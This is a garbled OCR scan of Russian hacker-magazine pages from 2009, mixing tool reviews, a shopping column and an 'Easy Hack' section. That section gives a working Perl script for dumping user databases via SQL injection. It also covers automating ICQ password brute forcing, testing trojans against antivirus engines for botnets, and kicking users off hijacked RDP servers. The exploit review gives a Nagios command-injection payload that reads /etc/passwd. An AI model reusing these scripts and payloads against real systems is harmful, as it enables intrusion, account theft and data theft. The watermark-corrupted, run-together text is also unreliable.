Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

129_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

15.04 Mб

Скачать

☆

<<< < Предыдущая 1 2 3 45 / 155 6 7 8 9 10 11 12 13 14 15 > Следующая >>>

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ОТЧЕТSQLMAP

ний, построенных на базе JS и Ajax: ведь никакой скрипт не может полностью сымитировать работу пользователя и проследить за всеми этапами выполнения приложения. На данный момент разработчиками реализованы модули для поиска Sql-инъекций, XSS и локальных инклудов. Сам процесс использования тулзы выглядит очень просто. ProxyStrike работает в виде обычной прокси (по умолчанию на 8008 порту), но помимо трансляции трафика в фоновом режиме выполняет фаззинг параметров, который твой браузер передает серверам. Архитектура приложения изначально легко расширяема, и ты можешь сам реализовать нужный функционал, написав соответствующий плагин.

XSpider www.ptsecurity.ru

Платформа: Windows

Первые строчки кода сканера XSpider были написаны 2 декабря 1998 года, — за прошедшие с тех пор 11 лет XSpider стал известен каждому российскому специалисту по информационной безопасности. Тулза с самого начала разрабатывалась как решение для анализа самых разных системы и обнаружения широкого круг уязвимостей. И хотя это тема для отдельного обзора, нельзя не отметить его модуль за анализ веб-приложений, благодаря которому программа и попала в сегодняшний обзор. Автоматический сканер быстро анализирует скрипты на заданном HTTP-сервере

и выдает о найденных уязвимостях, в том числе SQL-инъекций, инъекций кода, запуска произвольных программ, получения файлов, межсайтовый скриптинг (XSS), HTTP Response Splitting. Более того, осуществляется поиск слабых мест в конфигурациии сервера, в том числе директорий, доступных для просмотра без авторизации. База сканера еще обновляется, хотя разработчики всецело переключились на другой свой продукт — MaxPatrol.

ОТЕЧЕСТВЕННАЯРАЗРАБОТКА

XSPIDER

XÀÊÅÐ 09 /129/ 09

РЕАЛИЗУЕМИНЪЕКЦИИ СПОМОЩЬЮSQLSUS

sqlmap sqlmap.sourceforge.net Платформа: Windows, Unix, Mac

sqlmap — это уже более узкоспециализированная утилита, предназначенная специально для автоматизации SQL-инъекций. Написанная на Python’е тулза может обнаружить на сайте

иэксплуатировать самые разные виды этой уязвимости, включая самые сложные слепые инъекции. Если sqlmap обнаружил возможность инъекции, будь уверен — что-то ты да накопаешь. Впрочем, ее можно эффективно использовать в связке с более универсальными сканерами. Если Appscan или, скажем, продукт от Acunetix нашел SQL-уязвимость, ничего не стоит натравить на уязвимый сценарий sqlmap. Найти более мощный инструмент в паблике достаточно сложно. Во время поиска багов и экспулатации уязвимостей скрипт учитывает специфицику MySQL, Oracle, PostgreSQL, Microsoft SQL Server. Помимо этого частично поддерживаются Microsoft Access, DB2, Informix, Sybase и Interbase.

Для того, чтобы понять, с какой СУБД мы имеем дело, sqlmap использует сложные методики fingerprinting’а, основанные на анализе баннеров сервисов, сообщений об ошибках, форматирования вывода. Конечно, никакой автоматический скрипт не сможет довести проверку до конца без помощи человека. Но sqlmap — это отличный помощник, который может использовать как самые простые инжекции, так и сложные слепые (blind) инжекции. С его помощью ты можешь посмотреть системный баннер, выяснить имена текущего пользователя и базы, а также проверить, является ли юзер администратором. А быть может, повезет —

ис помощью найденного бага sqlmap тут же вытащит список пользователя с хешами паролей, баз данных, таблиц, колонок — или вообще сделает дамп всех записей в таблицах, или сможет выполнить произвольный SQL-запрос. Мало этого, сканеру известно и о багах, позволяющих читать произвольные текстовые и бинарные файлы на серверах, где используются MySQL, PostgreSQL и Microsoft SQL Server. А если на сервер уста-

новлены magic_quotes_gpc в настройках PHP, sqlmap непременно будет кодировать строку запроса с помощью CHAR() или другой подходящей функции. Это не просто утилита, это настоящий musthave!

СЛЕПАЯSQL-ИНЖЕКЦИЯ СПОМОЩЬЮBSQLBF

sqlsus sqlsus.sf.net

Платформа: Windows, Unix, Mac

Специальная утилита для реализации инъекций в базы данных MySQL. С помощью sqlsus ты намного проще сможешь эксплуатировать найденный баг, получив структуру базы, внедрив SQL-запрос, скачав с сервера нужные файл, закачав бэкдор и т.д., и т.п. Примечательно, что в качестве инструмента для хранения полученных дампов используется база SQLite, что чрезвычайно удобно. Можно, например, сделать копию базы, переместив таблицы или колонки с уязвимого сервера себе в локальную базу на SQLite и полноценно работать с ней. Если ты не можешь обра-

титься к базе information_schema, или если ее не существует, тулза поможет пробрутфорсить название таблиц и колонок. sqlsus поможет реализовать и blind-инъекции, но для этого лучше будет заюзать следующую утилиту.

bsqlbf-v2 code.google.com/p/bsqlbf-v2 Платформа: Windows, Unix

Эта тулза специально разработана для осуществления слепых SQL-инъекций. Причем изначально поддерживалась только MySQL, но в обновленной версии были реализованы методики сразу для трех других СУБД: MS SQL, PostrgeSQL, Oracle. bsqlbf написана на Perl,

принимает SQL-запросы через командную строку и способна реализовать инъекцию в целочисленные и строковые поля. Всего поддерживается 6 видов слепых инъекций, а тип атаки обозначается с помощью ключа для запуска «-type»:

./bsqlbf-v2.3.pl -url http://192.168.1.1/injection_ string_post/1.jsp?p=1 -type 4 -match "true" -cmd "ping xakep.ru"

В данном примере эксплуатируется уязвимость

ORACLE dbms_export_extension exploit, позво-

ляющая с помощью слепой инъекции выполнить произвольную команду. z

039

hang

NOW!

BUY

PC_ZONE

w Click

СТЕПАН «STEP» ИЛЬИН / STEP@GAMELAND.RU /

-xcha

Накрутки местных барыг подчас изумляют. То, что можно

купить в Европе и Штатах за 100 долларов, у нас продают

за 200. Если цена 200 там — здесь пытаются продать за

500. Я не говорю о товарах, на которые распространяются

РЕДАКТОРА

серьезные таможенные пошлины — нет. Втридорога продают

абсолютно все. Серьезную разницу я ощутил в августе, когда

операции.

выбирал себе радар-детектор — это такой полезный девайс,

который вешается на лобовое стекло машины и предупре-

ждает об излучении различных ДПС-ных примочек. В свете

появления мобильных камер, устанавливающихся в абсолют-

но любое место, заблаговременно сбавлять скорость стало

особенно полезным для кошелька :). Отыскав подходящий

по характеристикам вариант, я поинтересовался стоимостью.

Цена нужной модели на eBay составляла примерно $140, что

более чем приемлемо. При этом тот же самый девайс дешев-

ле 10000 руб. у нас было не найти! Ничего себе разница,

правда? Убедившись, что никакой специфики в девайсах из

разных стран нет, было принято единственно верное реше-

ние — заказать девайс из Штатов.

Заморачиваться с частными продавцами и мини-лавочками

на eBay мне не хотелось, поэтому аналогичную позицию за

$144 я быстренько нашел в другом месте — известном запад-

ном магазине Amazon.com. Но стоило только приступить к

оформлению заказа, как меня поджидал традиционный для

таких ситуаций облом: доставка товара магазином возмож-

на только по США и Канаде. «Не отправляем в Россию — и

точка». Сдаваться не хотелось, поэтому я решил поискать

компании, которые могли бы выступить посредниками в этой

КОЛОНКА

Оказалось, что обойти подобное ограничение не так уж и

такой адрес:

сложно, и помочь в этом может специальный почтовой адрес в США, зарегистрированный на твое имя. «Виртуально» прописать тебя на территории Штатов предлагают специальные посреднические компании. Получив посылку на твое имя, они отправляют ее дальше в любую точку мира — главное, указать адрес и положить деньги на депозит. Положительные отзывы я нашел по www.myus.com и www.shipito.com. Второй из них оказался дешевле — его-то я и выбрал.

Во время регистрации тебе необходимо с помощью пластиковой карты или PayPal’а будет перечислить на свой депозит $8.50. Это не плата за регистрацию, а цена обработки одной посылки компанией. После этого ты получишь примерно

РАДАР-ДЕТЕКТОР С AMAZON.COM

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

STEPAN ILIN

C/O EASTBIZ CORP. 2972 COLUMBIA ST. SUITE # 6711 TORRANCE, CA 90503

Маленький городок в Калифорнии — и ни слова о России. :) Недолго думая, я сделал повторную попытку заказать товар. Amazon без проблем принял адрес и предложил перейти

к оплате. Согласившись поучаствовать в какой-то триальной программе, я получил еще и бесплатную доставку по Штатам.

И вот — уже через несколько дней посылка бесплатно была доставлена в Shipito. В этот момент к тебе приходит письмо

спросьбой заполнить декларацию, указав ее содержимое и стоимость, а также выбрать вариант для отправления. Товары до 10000 руб. в неделю пошлиной не облагаются, поэтому я указал все как есть и оплатил необходимые за доставку деньги (что-то около $35), выбрав USPS Express Mail (аналог нашей почты). Кстати говоря, сразу отправлять себе посылку совершенно не обязательно. Если ты заказал несколько предметов в разных местах, то Shipito может перепаковать их в одну посылку. Плата за это небольшая, а сэкономить на доставке можно очень и очень много. Моя посылка шла ровно 10 дней, причем на протяжении всего времени я мог отслеживать ее на сайте USPS и EMS (www.emspost.ru) по номеру отправления. Из всего срока доставки существенный лаг вносит наша таможня, но зато после нее посылку мне доставили лично курьером.

Зачем я это рассказал? Да потому, что потратив полчаса, ты можешь заказывать предметы по двое меньшей цене и

снамного большим ассортиментом. Даже если магазин не отправляет товары напрямую в Россию. Девайс, который здесь не купить дешевле десяти тысяч рублей, удалось приобрести за $186. Конечно, жертвой стала скорость доставки, но ради почти двукратной экономии я готов подождать.

ИНТЕРФЕЙС SHIPITO.COM

040	XÀÊÅÐ 09 /129/ 09

hang

NOW!

BUY

w Click

-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

hang

NOW!

BUY

ВЗЛОМ

w Click

M0R0 M0R0@INBOX.RU

ЛЕОНИД «R0ID» СТРОЙКОВ R0ID@MAIL.RU

-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha


Easy	Hack	ХАКЕРСКИЕ
		СЕКРЕТЫ
		ПРОСТЫХ
		ВЕЩЕЙ

ЗАДАЧА: АВТОМАТИЗИРОВАТЬ №1 БРУТАСЕКСИСПОЛЬЗОВАНИЕМ

.BRUTAL

РЕШЕНИЕ:

.Brutal являетсяоднойизпопулярнейшихсофтиндлябрутаасек, посему желаниеавтоматизироватьегоработу— вполнепонятно. Дляосуществления задуманногомывоспользуемсяутилойStorm 2008 Brutal Edition, котораяпредставляетсобойаналогужеизвестнойтебетулзыStorm 2008 ипредназначена дляоблегченияуправлениябрутом. Изосновныхособенностейинструмента стоитвыделить:

•Возможность управления .Brutal’ом (например, запуск/остановка брута, cleanup, отображение статистики, etc)

•Доступ к виндовой консоли на удаленном дедике

•Отправка валидных пар уин;пасс тебе в асю :)

•Организация очереди списков для брута

•Автоматическое обновление проксиков по таймауту

•Удобная система администрирования

•Возможность управления брутом с нескольких номеров, с указанием индивидуальных настроек

•Загрузка удаленных файлов, icq gate (использование бота в качестве гейта), отправка и принятие сообщений и т.д.

•Возможность использования бота в качестве гейта

Настройкасофтаиуправлениебрутомнетребуетособыхусилий. Необходимо лишьпроизвестиряднехитрыхманипуляций:

1.Сливаемутилуснашегодиска.

2.Вбиваемданныеуинадлябота.

3.Управляемботомприпомощикоманд:

•Командыуправления.Brutal’ом:

/stats — отображение статистики /start — нажать баттон ’start’

/stop — нажать баттон ’stop’

...

/threads — установить количество потоков

• Командыуправленияботом:

Автоматизируембрутасек

/adminlist — отобразить админ-лист

/add UIN[:permissions] — добавить уин в админ-лист /delete UIN — удалить уин из админ-листа

/pchange UIN:perm_index:permission, /pchange UIN:permissions

— изменение прав

...

/settings — отобразить настройки бота

• Командыуправлениясурс-листами:

/srclist — отобразить список сурс-листов

/srcadd — добавить сурс-лист /srcdel — удалить сурс-лист

/gen — сгенерировать новый сурс-лист

/gen+ — генерация нового сурс-листа с чеком строк на дубли

• Командыуправленияпроксиками/соксами:

/https — сохранить https-прокси лист (ip:port) /socks4 — сохранить сокс4-лист

/socks5 — сохранить сокс5-лист

/upd [proxy_types] [proxy_update_type] — обновить прокси-лист

Ничегосложноговпроцессеуправленияботомнет. Такчтоможешьсмелоавтоматизироватьбрут, избавивсебяотрутины:).

		ЗАДАЧА: НАСТРОИТЬСОБСТВЕН-	софта:). Примертому
	№2	ЗАДАЧА: НАСТРОИТЬСОБСТВЕН-	софта:). Примертому
		НЫЙАНОНИМАЙЗЕРСАВТОМАТИ-	— HTTP Local Proxy.
		ЧЕСКОЙСМЕНОЙIP-АДРЕСА	Именноэтусофтинумы
			ибудемиспользовать.
РЕШЕНИЕ:			Прогапредставляет
РЕШЕНИЕ:			собойанонимайзер,
Еслитынепривыкюзатьпабликпроксикипоизвестнымпричинам, аплатным			работающийчерезпхп-
сервисамнедоверяешь— остаетсялишьодинвыход: поднятьсобственный			гейты. Настроитьутилу
прокси. Ксчастью, сделатьэтодовольнопросто, благо, естьмассаготового			несложно:
			несложно:	Собственныйанонимайзер

042					XÀÊÅÐ 09 /129/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

1.Сливаемутилуснашегодиска.

2.Распаковываемархив, внемтрифайла: gate.php, host.txt, proxy.exe.

3.Заливаемскриптgate.php нахост(илинесколькохостов).

4.Вфайлhost.txt прописываемполныйпутьдозалитогоскриптаgate.php, например:

site.com/gate.php

site2.com/gate.php

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

site3.com/gate.php

5.Запускаемproxy.exe,подефолтуоткрываетсяпорт8080изагружаетсясписок хостовизфайлаhost.txt.

6.Открываембраузер,прописываемхттп-прокси127.0.0.1ипорт,накоторомон запущен(подефолту—8080).

Вотивсе.Еслифайлhost.txtсодержитболееодногоадреса,тоproxyбудетавтома- тическименятьIP-адреса.Чтонамитребовалось:).

№3	ЗАДАЧА: СЛИТЬБАЗУЮЗЕРОВЧЕ-	Обративниманиенапеременную$url, атакженапеременную$i — она
	РЕЗSQL-ИНЪЕКЦИЮ	определяетколичествозаписейвтабличке.
		3.Запускаемграббернаудаленномхостеиждем. Статабудетписатьсяв
РЕШЕНИЕ:		файлcount.txt.
РЕШЕНИЕ:		4.Послетого, какработаграбберазакончена— создаемфайлparser.pl:
Обнаруживскуль-инъектнакаком-нибудьпортале, тебе, наверняка, захо-
четсяслитьоттудавсюбазуюзеров. Кактыпонимаешь, перебиратьсотни,		#!/usr/bin/perl
апоройитысячизаписейвручную, используяlimit илиtop — неочень		print "===================================\n";
удобно. Поэтомутребуетсяавтоматизацияпроцесса. Рассмотримпример:		print "= SQL-injection Parser =\n";
1. Допустим, найденныйтобойsql-инъектвыглядиттак:		print "===================================\n";
		open(TT, 'result.txt');
http://blablabla.com/pages.php?id=-1+UNION+SELECT+1,2,con		open(F, '>result2.txt');
cat(char(94),id,char(58),name,char(58),surname,char(58),		while ($line = <TT>)
city,char(58),address,char(58),email,char(94)),4,5,6,7,8,		{
9,10,11+from+users+limit+1,1/*		$x=index($line, "^");
		$z=rindex($line, "^");
2.Теперьсоздаемфайлgrabber.pl следующегосодержания:		$z=rindex($line, "^");
2.Теперьсоздаемфайлgrabber.pl следующегосодержания:		if($x>-1 && $z>-1){
		$long=$z-$x;
#!/usr/bin/perl		$res=substr($line, ($x+1), ($long-1));
print "===================================\n";		print F $res."\n";
print "= SQL-injection Grabber =\n";		$x=-1;
print "===================================\n";		$z=-1;
use LWP::Simple qw(get);		}
open(F, '>result.txt');		}
$z=0;		print "===================================\n";
for ($i=0;$i<=1000;$i++){		print "= DONE =\n";
$url="http://blablabla.com/pages.php?id=-1+UNION+SELECT+1,		print "===================================\n";
2,concat(char(94),id,char(58),name,char(58),surname,char(58		close TT;
),city,char(58),address,char(58),email,char(94)),4,5,6,7,8,		close F;
9,10,11+from+users+limit+$i,1/*";
9,10,11+from+users+limit+$i,1/*";		5. Парсервыберетизмусоравсезаписи, обрамленныесимволом^. На
$cont=get($url);		5. Парсервыберетизмусоравсезаписи, обрамленныесимволом^. На
print F $cont."\n";		выходетыполучишьчитабельнуюбазусданнымиюзеров. Кстати, учти,
$z=$z+1;		чтограббер— однопоточный. Крупнуюбазуутянутьимврядлиудастся,
open(C, '>count.txt');		однакониктонемешаеттебеприложитьусилияипереписатьего, добавив
print C $z;		паруполезныхфункций:).
close C;
}
close F;
open(D, '>done.txt');
print D $z."\n";
close D;
#print "===================================\n";
#print "= DONE =\n";
#print "===================================\n";
#print $z;		Сливаембазучерезsql-инъект
#print $z;


	ЗАДАЧА: ПРОВЕРИТЬEXE’ШНИК
№4	ЗАДАЧА: ПРОВЕРИТЬEXE’ШНИК	разумнеевоспользоваться автоматическими сервисами по чекингу
	НАПАЛЕВНОСТЬРАЗЛИЧНЫМИ	файлов.
	АНТИВИРЯМИ	1.Платныесервисы:
РЕШЕНИЕ:
РЕШЕНИЕ:		• avcheck.ru
Еслиутебясвойботнет, илитыпросторешилнадкем-топоглумиться—		• avcheck.biz
проверитьехе-шниктрояпростонеобходимо. Однакодесятокантивирей		• av-check.com
себенепоставишь, даипроверятьвручную— делонеблагодарное. Гораздо		• virtest.com

XÀÊÅÐ 09 /129/ 09

043

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P

				to	BUY						ВЗЛОМ
w Click				to						m
w Click										m
w
	w								o
	.								.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

2.Бесплатныесервисы:

-virustotal.com

-www.novirusthanks.org

-virusscan.jotti.org/ru

-scanner.virus.org

-virscan.org

Описыватьбесплатныесервисыянебуду, ибобольшинствоизнихотсылаеткопии твоихфайловвантивирусныекомпаниидлядальнейшегоанализа, чтонеестьгут. Вместоэтогомыостановимсянадвухкрупнейшихплатныхсервисах— avcheck. ru иvirtest.com. Первыйпредлагаетследующиетарифы.

Обычнаяпроверка:

$1 — 1 проверка $10 — 20 проверок $15 — 40 проверок

Автоматическаяпроверка:

$15 — раз в 48 часов (в течение 30 дней) до 2х файлов + бонус 5 обычных проверок $20 — раз в 24 часа (в течение 30 дней) до 2х файлов + бонус 10 обычных проверок

$25 — раз в 24 часа (в течение 30 дней) до 3х файлов + бонус 20 обычных поверок

Списокантивирусовдовольноширок:

Antivirus Version Result AVG 8.5 — ArcaVir 2009 — Authentium 5.1 — Avast 4.8.1229 — Avira 7.9.1.1 — BitDefender 7.90

—ClamAV 0.95.2 — DrWeb 5.0 — F-Prot 6.0 — F-Secure 8.0 — Kaspersky 8.0.0.506 — McAfee 5711 — NOD32 4342 — Norman 6.01.09

—Panda 9.04 — Sophos 4.44 — Symantec 10.2.

Все, чтооттебяпотребуется:

1.Заходимнасайтсервиса— avcheck.ru.

2.Регистрируемся.

3.Пополняембалансаккаунта.

4.Выбираемрежимручнойпроверки.

5.Заливаемфайл.

6.Черезнесколькосекундсмотримрезультатпроверкиповсемантивирусам. Аналогичнымобразомработаетиvirtest.com, основнымегоотличиемявляется возможностьпроверкинетолькоexe’шников, ноисвязоксплойтов. Чемпользоваться— выбиратьтебе, анонимностьтвоегофайлавтвоихруках:).

Чекаемexe’шник

№5 ЗАДАЧА: ПРОСКАНИТЬДИАПАЗОН

НАПРЕДМЕТНАЛИЧИЯУЗЛОВС НУЖНЫМОТКРЫТЫМПОРТОМ

РЕШЕНИЕ:

1.Беремсофтинуподназваниемdfind (ееможнонайтинакомпакт-диске).

2.Вбиваемкоманду:

dfind -p 3389 <start_ip> <end_ip>

99% людей, наверняка, скажут: «Нетничегопроще! Запускаемnmap с		3.Замеряемскоростьсканасетки88.35.0.0/16 (вбиваемкоманду«dfind
ключами-PS<port> -p <port> AA.BB.CC.DD/MM». Ибудутправы, нотолько		-p 3389 88.35.0.0 88.35.255.255»). Получаем3 минуты40 секундифайлик
отчасти. Действительно, сетьклассаСможнопросмотретьитак, ночто		весом7 килобайтсрезультатамиработы. Кстати, результатысохраняются
делатьсB иАсетями? Покаnmap будетсканить, самИосифСталинуспе-		воченьудобнойформеввиде<хост>:<открытыйпорт>. Стойжезадачей
етвоскреснутьизнебытия, прийтиквластиизапретитьвесьинтернеткак		Nmap справилсяза29 минут4 секунды. Конечно, nmap можетвыдатьеще
пагубнуюсточкизренияморальноговоздействиянаумыиндивидуумов		кучуинфыосервисах, определитьОСивсетакое, нонахренаононам
среду. Тутнужночто-нибудьпростое, быстрое, желательномногопоточ-		здесьнадо? Крометого, nmap гораздомедленнее, ипослетого, какон
ное. Какнасчетсканав2500 потоководновременно? По-моему, дляэтой		отработает, тебеещепридетсяпарситьрезультаты.
задачивсамыйраз.

	nmap vs dfind

044	XÀÊÅÐ 09 /129/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

№6 ЗАДАЧА: ОТКЛЮЧИТЬ

ТЕРМИНАЛЬНУЮСЕССИЮПОЛЬЗОВАТЕЛЯ

СЕРВЕРНОЙВЕРСИИWINDOWS СРЕДСТВА-

МИRDP

РЕШЕНИЕ:

ЕслиSMB-сервисынедоступны, установкадоверительныхотношенийиинвентаризациясессийневозможны. Вомногихслучаяхсерваквообщенаходитсязафайромиединственныйспособподключитьсякнему— воспользоватьсяпортом3389 иклиентомmstsc.

Однакотрадиционныйконнектнепроходит, таккаквываливается сообщениесошибкойопревышенииколичествасессийисоединениезакрывается. Значит, надоподключатьсякужеустановленнойсессии. Дляэтоговклиентепредусмотренключ/console, которыйпозволяетудаленноподключитьсяксессиилокального

пользователя, илиsession 0. Однакостоитотметить, что, начинаяс
			Управлениетерминальнымисессиями
Windows XP SP3, Windows Vista SP1 иWindows Server 2008, клиентmstsc
ключа/console уженеимеет. Связаноэтостем, чтовновыхверсияхОС
отMicrosoft нулеваясессияпересталабытьинтерактивнойииспользу-
етсятолькодлязапускасистемныхпроцессовисервисов. Интерактивныесессии				2.ЗапускаемTerminal Services Manager:
пользователейнумеруются, начинаясединицы. Ничегострашноготутнет, просто
вместоключа/console втакихслучаяхследуетиспользоватьключ/admin.				tsadmin
1.Подключаемсяксуществующейсессии:
1.Подключаемсяксуществующейсессии:				3.Отключаемкакую-либосессию(кроменулевой:)).
				3.Отключаемкакую-либосессию(кроменулевой:)).
mstsc /v:<server_address> /console (/admin)				4.КоннектимсяксерверупоRDP.



№7	ЗАДАЧА: ОТКЛЮЧИТЬТЕРМИ-			user:<administrator_user_name>
	НАЛЬНУЮСЕССИЮПОЛЬЗОВАТЕЛЯ
	НАЛЬНУЮСЕССИЮПОЛЬЗОВАТЕЛЯ
	СЕРВЕРНОЙВЕРСИИWINDOWS			2. Инвентаризуемсессииизапоминаемидентификатортой, которую
СРЕДСТВАМИКОМАНДНОЙСТРОКИ				следуетотключить:
РЕШЕНИЕ:
РЕШЕНИЕ:				qwinsta /server:<server_address>
Уверен, разтычитаешьz, тодляреализациисвоихзлодейскихзамыслов

нередкоприбегаешькпомощистороннихсерверов(впростонаро-				3.Отключаемсессию:
дье— дедиков). Иногдасервервыплевываетнедружелюбноесооб-
щение«Terminal server has exceeded the maximum number of allowed				logoff <session_id> /server:<server_address>
connections» иисключаетвозможностьдальнейшейработы. Проблема

кроетсявотсутствиилицензийтерминальногодоступа, врезультате				4.КоннектимсяксерверупоRDP.z
чеговиндаработаетврежиме«Удаленного
чеговиндаработаетврежиме«Удаленного		Принудительныйlogoff
администрирования» иразрешаеттолькодва		Принудительныйlogoff


одновременныхсеанса, втомчислеиотклю-
ченных. Ситуациявозникаетдостаточночасто,
например, еслиадминнасервереневыполняет
выходизсессии, априокончанииработыпрос-
тозакрываетокноудаленногорабочегостола.
Принципиальновозможнодвапутирешения.
Первыйинаименеебеспалевный— дождаться,
покакакая-нибудьизсессийнезавершится.
Еслиутебямногодедов, этовполнеприемле-
мо, впротивномслучаенадозанятьактивную
позициюивыбитьодногоизпользователей. Как
этосделать, когдаксерверудаженеприконек-
титься? Еслинаудаленномузлеоткрытпорт445,
можновоспользоватьсясредствамикомандной
строкидляотображениятекущихсеансовиих
отключения.
1. Создаемдоверенныеотношениясудаленным
узломсиспользованием«net use»:

net use \\<server_address>\
IPC$ <administrator_password> /

XÀÊÅÐ 09 /129/ 09

045

hang

NOW!

BUY

ВЗЛОМ

w Click

АНДРЕЙ КОМАРОВ /HTTP://WAP-CHAT.RU/

-xcha

ОбзорЭксплоитов

ЛИСТИНГКАТАЛОГА НАУДАЛЕННОМСМАРТФОНЕ

Скольковсегопроизошло! Слухиозакрытииmilw0rm.com ипоявлениекучизеркал— внеобсуждения. Летовыдалосьжаркимнетолько потемпературе, ноиподвижениямвмиреэксплойтовиуязвимостей ПО: браузерныебрешивMozilla Firefox 3.5 иActiveX-компоненте

Video Microsoft Internet Explorer 7, критическиеуязвимостивряде

OpenSource-продуктов, акитайцыготовятсупер-защищеннуюОС kylin! Времениотдыхатьпростонет. Надоатаковать!

EXPLOIT

ЛИСТИНГКАТАЛОГА НАУДАЛЕННОМ СМАРТФОНЕ

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

01НЕАВТОРИЗИРОВАННОЕ ИСПОЛНЕНИЕПРОИЗВОЛЬНЫХ КОМАНДВNAGIOS

BRIEF Nagios — системамониторингасоткрытымисходнымкодом, использующаясядажевкорпоративномсекторе. Всетевойинфраструктуре оназанимаетместо«нюхача», которыйследитзаслужбами, корректностьюихфункционирования, всевозможнымикомпонентамисети. Вслучае чего, Nagios генерируетоповещение, чтобыадминистраторсвоевременноустранилпроблему. ДляудобстваадминистрированияNagios может управлятьсяпосредствоммобильноготелефоначерезтехнологиюWML. Условноговоря, администратор, отдыхаянадаче, заходитчерезсотовый насайт, выбираеттамлинкиисмотритстатуссистемы, живучестьотдельныххостов, присланныеоповещенияиещемноговсего.

EXPLOIT Уязвимостьсодержитсявмодулепроверкистатуса, причем сразувдвухместах(утилитахPING/TRACEROUTE), хотясутьсамой брешитипичнаисводитсякнебезопасномуиспользованиюсистемных вызовов«popen». Кэтойсерии, вообще, можнопричислитьцелыйкласс небезопасногопрограммирования, связанногосвыполнениемкоманд. Онипопадаютсявсамыхудивительныхместах. Кпримеру, парумесяцев назадоднимхакеромбылвзломанизвестныйзакрытыйфорумMazafaka, гдемодульtraceroute форумаVBulletin уязвимописываемойнижеуязвимостью.

Утилитынаходятсятут:

tools -> ping

tools-> Traceroute WAP/WML pages

Использоватьихможнотак:

https://somehost.com/nagios/cgi-bin/statuswml.cgi?ping =173.45.235.65%3Becho+%24PATH

(%B — ";" â ASCII, %24 — "$")

Послеисполненияяполучилрезультаты, чтоудаленныйхостжив, и егосетевыепараметры, атакжеполныйвыводпеременнойокружения

(FreeBSD / $PATH):

/sbin:/bin:/usr/sbin:/usr/bin:/usr/games:/usr/local/

sbin:/usr/local/bin:/root/bin

Кодуязвимойпроцедурыdisplay_ping измодуляstatuswml.c:

/* run the ping command */ fp=popen(buffer,"r");

if(fp){

while(1)

{

fgets(buffer,sizeof(buffer)-1,fp); if(feof(fp))

break;

strip(buffer);

if(odd)

{

odd=0;

printf("%s<br/>\n",buffer);

}

else

{

odd=1;

printf("<b>%s</b><br/>\n",buffer);

}

else

printf("Error executing

046	XÀÊÅÐ 09 /129/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Атакавпрогрессе!

ping!\n");

pclose(fp);

...

Какнетруднозаметить, popen исполняетлюбоесодержимое, которое попадаетвпеременнуюbuffer. Buffer контролируетсявкодетолькопри объявлениинаограничениевводимыхданных(char buffer[MAX_INPUT_ BUFFER];), ноегосодержаниеабсолютнопроизвольно. Логикасоставлениябуфератакова: сначалаоносвобождается, далеепустойбуферслипаетсястем, чтомыввелидляпингавкачествеадреса, искармливаетсяна исполнение. Втомчисле, знакипробела, ведьэтоженигденеоговорено:

if(!strcmp(temp_ptr,"HOSTADDRESS")) strncat(buffer,ping_address,sizeof(buffer)-

strlen(buffer)-1);

Конечно, никтонемешаетнамвкачествеадресазадать127.0.0.1;mail < / etc/passwd иликакую-либокритическиважнуюдиректорию.

TARGETS Nagios набазе3.x ветки+ 2.0rc2 (версии, гдевозможна установкадополнительныхмодулей, аименно— включенногоWAP-ин- терфейса).

SOLUTION Создательбыстроотреагировалнауязвимостьинаписал решение. Вдобавокмноголюбителейещераньшевыпустилисобствен-

ныепатчи(tracker.nagios.org/view.php?id=15), убирающиепробелыи добавляющиепроверкунаправильностьуказанногодоменаилиIP.

02MOD_SECURITYHTTP

PARAMETER

POLLUTION

